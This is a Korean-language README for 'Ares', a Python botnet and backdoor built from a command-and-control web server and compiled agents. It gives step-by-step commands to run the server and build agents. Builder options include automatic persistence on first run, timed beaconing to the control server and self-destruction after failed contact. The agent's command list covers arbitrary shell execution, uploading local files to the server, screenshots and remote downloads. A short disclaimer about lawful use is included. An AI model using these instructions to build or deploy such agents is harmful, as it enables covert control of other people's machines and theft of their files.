
파이썬 봇넷 및 백도어
Ares는 Python 원격 접속 도구입니다.
경고: 이 소프트웨어는 현재 귀하의 법률에 따라서만 사용하십시오. 이 소프트웨어의 오용은 법적 및 윤리적 문제를 야기할 수 있으며, 이에 대해 저는 지지하지 않으며 책임을 지지 않습니다.
Ares는 두 가지 주요 프로그램으로 구성됩니다:
웹 인터페이스는 Python이 실행되는 모든 서버에서 실행할 수 있습니다. 에이전트는 pyinstaller를 사용하여 네이티브 실행 파일로 컴파일할 수 있습니다.
Python 요구 사항 설치:
pip install -r requirements.txt
데이터베이스 초기화:
cd server
./ares.py initdb
Linux에서 Windows 에이전트를 컴파일하려면 wine 설정 (선택 사항):
./wine_setup.sh
내장 (디버그) 서버로 실행:
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
또는 gunicorn을 사용하여 실행:
gunicorn ares:app -b 0.0.0.0:8080 --threads 20
이제 서버는 http://localhost:8080 에서 접근 가능합니다.
Python 에이전트 실행 (config.py를 상황에 맞게 업데이트):
cd agent
./agent.py
새 에이전트를 단일 바이너리로 빌드:
./builder.py -p Linux --server http://localhost:8080 -o agent
./agent
지원되는 옵션 목록을 보려면 ./builder.py -h 실행
./agent/builder.py -h
usage: builder.py [-h] -p PLATFORM --server SERVER -o OUTPUT
[--hello-interval HELLO_INTERVAL] [--idle_time IDLE_TIME]
[--max_failed_connections MAX_FAILED_CONNECTIONS]
[--persistent]
Ares 에이전트를 빌드합니다.
선택적 인수:
-h, --help 도움말 메시지 출력 후 종료
-p PLATFORM, --platform PLATFORM
대상 플랫폼 (Windows, Linux).
--server SERVER CnC 서버 주소 (예: http://localhost:8080).
-o OUTPUT, --output OUTPUT
출력 파일 이름.
--hello-interval HELLO_INTERVAL
CnC에 각 요청 사이의 지연 시간 (초).
--idle_time IDLE_TIME
유휴 상태로 전환되기까지의 비활성 시간 (초).
유휴 모드에서는 에이전트가 명령을 덜 자주 가져옵니다 (매 <hello_interval> 초마다).
--max_failed_connections MAX_FAILED_CONNECTION
CnC와 연속으로 <max_failed_connections>회 연결 실패 시 에이전트가 자체 파괴됩니다.
--persistent 첫 실행 시 자동으로 에이전트를 설치합니다.
<any shell command>
쉘에서 명령을 실행하고 출력을 반환합니다.
upload <local_file>
<local_file>을 서버에 업로드합니다.
download <url> <destination>
HTTP(S)를 통해 파일을 다운로드합니다.
zip <archive_name> <folder>
폴더의 zip 아카이브를 생성합니다.
screenshot
스크린샷을 찍습니다.
python <command|file>
Python 명령 또는 로컬 파일을 실행합니다.
persist
에이전트를 설치합니다.
clean
에이전트를 제거합니다.
exit
에이전트를 종료합니다.
help
도움말을 표시합니다.